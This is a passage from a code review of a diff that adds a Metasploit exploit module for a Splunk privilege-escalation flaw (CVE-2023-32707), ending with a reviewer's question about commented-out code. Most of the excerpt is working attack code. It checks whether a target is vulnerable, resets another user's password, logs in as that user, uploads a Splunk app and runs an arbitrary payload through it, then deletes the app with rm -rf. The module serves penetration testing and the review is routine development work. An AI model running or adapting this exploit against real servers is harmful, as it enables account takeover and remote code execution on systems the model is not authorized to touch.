modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb

```diff
@@ -0,0 +1,409 @@
+      ]
+    )
+    # That depends on finding a strategy to distinguish commands that return output and commands that don't
+    # register_advanced_options(
+    #   [
+    #     OptBool.new('ReturnOutput', [ true, 'Display command output', false ])
+    #   ]
+    # )
+  end
+
+  def check
+    splunk_login(datastore['USERNAME'], datastore['PASSWORD'])
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),
+      'method' => 'GET',
+      'cookie' => cookie,
+      'vars_get' => {
+        'output_mode' => 'json'
+      }
+    })
+
+    return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200
+
+    body = res.get_json_document
+    version = Rex::Version.new(body['generator']['version'])
+
+    return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless (
+      version < Rex::Version.new('9.0.5') ||
+      version < Rex::Version.new('8.2.11') ||
+      version < Rex::Version.new('8.1.14')
+    )
+
+    print_status("Detected Splunk version #{version} which is vulnerable")
+    capabilities = body['entry'].first['content']['capabilities']
+
+    return CheckCode::Safe("User '#{datastore['USERNAME']}' does not have 'edit_user' capability") unless capabilities.include? 'edit_user'
+
+    report_vuln(
+      host: rhost,
+      name: name,
+      refs: references,
+      info: [version]
+    )
+
+    CheckCode::Vulnerable("User '#{datastore['USERNAME']}' has 'edit_user' capability")
+  end
+
+  def app_name
+    datastore['APP_NAME']
+  end
+
+  # The cleanup method is removing the app before the session is closed and it is broking the session.
+  #
+  def cleanup
+    return unless session_created?
+
+    super
+    # Destroy job
+    vprint_status("Cleaning up: destroying job #{@job_id}")
+    send_request_cgi({
+      'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),
+      'method' => 'DELETE',
+      'cookie' => cookie
+    })
+    # Remove app
+    vprint_status("Cleaning up: removing app #{app_name}")
+    execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' => {
+        'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']
+      }
+    })
+  end
+
+  def exploit
+    splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])
+    splunk_login(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])
+
+    splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE'])
+
+    @job_id = execute_command(payload.encoded, { app_name: app_name })
+    # TODO: distinguish commands that return output and commands that don't
```

Comment:
This is in reference to https://github.com/rapid7/metasploit-framework/pull/18348#discussion_r1325978295 right? What was the outcome of testing? Is this something that needs to be figured out, or dead code?